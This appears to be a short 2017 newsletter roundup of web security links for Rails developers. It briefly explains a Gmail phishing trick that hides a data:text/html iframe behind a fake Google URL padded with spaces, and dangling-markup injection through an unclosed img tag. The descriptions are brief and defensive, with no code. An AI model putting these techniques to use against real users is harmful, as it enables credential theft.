Oh this, „… is the closest I’ve ever come to falling for a Gmail phishing attack.“, shows a real clever attack. An embedded fake attachment image sends you to a data:text/html address. The first part of it then is a plausible-looking Google URL. And only after lots of spaces, it actually loads the phishing site in an iframe. A lot to watch out for in 2017. Including this:
A short story about how encryption can go very wrong with a (Ruby) workflow we’re all guilty of using.
The ongoing Content-Security-Policy journey at Github.
This time focusing on images and dangling markup. That’s when an attacker injects an <img> tag without closing it to extract the HTML of the rest of the page.
A new two-factor authentication lockout recovery process at Github: Using Facebook
The HTTPS-traffic via Firefox is now over 50% for the first time
There are now „Not Secure“ warnings for insecure pages with password and credit card input fields in Chrome and Firefox 51.
Mozilla’s coding and security checklist for their services
Ransom attacks turn to web apps, check your MongoDB, Elasticsearch, Redis, Cassandra, Hadoop
Like this kind of articles?
Subscribe to hear about new Rails security resources first. Only helpful articles and guides. Monthly(ish) updates, no spam.
